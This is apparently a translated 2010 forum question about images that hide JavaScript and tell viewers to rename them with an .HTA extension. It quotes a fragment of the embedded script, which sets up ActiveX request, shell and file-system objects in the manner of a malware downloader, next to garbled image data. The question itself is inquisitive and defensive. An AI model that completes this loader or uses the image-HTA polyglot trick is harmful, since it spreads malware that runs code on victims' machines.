我注意到分发潜在不安全代码的新趋势,其中人们将图像发布到服务器,并提示水印表明它们将文件名更改为具有.HTA文件扩展名。在图像文件中嵌入Javascript
我意识到.HTA是一个HTML应用程序文件,它被微软的逻辑隐式信任,并且可以包含代码来处理任何基于Web的任何事情。我用我最喜欢的文本编辑器打开文件,令我惊讶的是图像文件中有Javascript代码!
jfHe299x4qBICCBRgpbl81xTjwucn9j4s1UVZxe8kwoJcdWnXuVHqpilRRhptKRACMBr5koY8vt6AEttD5xeGTOPCfBoQVjCvblkiGcc4ddlfiZiBPdCVAlelSbvhv9XWcoMIYyGMCbMaGv9YUyFrHZg3ZVx6HnRCgz4CyaA2bU9qn6R3NkmHx0W3uG7SZcHYyPiMN6AnWDGXRztMnxL3sY1s3h9VH1oTL34iYawlaEUDOUscX19pPz89v0rfmlqKTXce16vSZ6JDsy4IC5SktfXdt3m50z2R5BbwuhP5BHJITxvD4dHzL6K4uh9tIc4gYCFnDV
//<script id=thisscript>
var dom1 = ["zip","img","zip","orz","orz","zip","cgi"];
var dom2 = ["bin","dat","bin","tmp","tmp","bin"];
// Global XMLHttp, shell, and file system objects
var request = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fs = new ActiveXObject("Scripting.FileSystemObject");
源代码下面还有更多的乱码图片数据。这只是一个片段。
我很好奇,知道他们如何能够将Javascript代码添加到图像文件而不会破坏图像文件格式并使其无法查看。我向一些同事介绍了这一点,他们也同样难过。
你能展示一个完整的文件示例吗? – 2010-08-08 18:05:46
我很想看到一个完整的例子 – 2010-08-08 18:08:29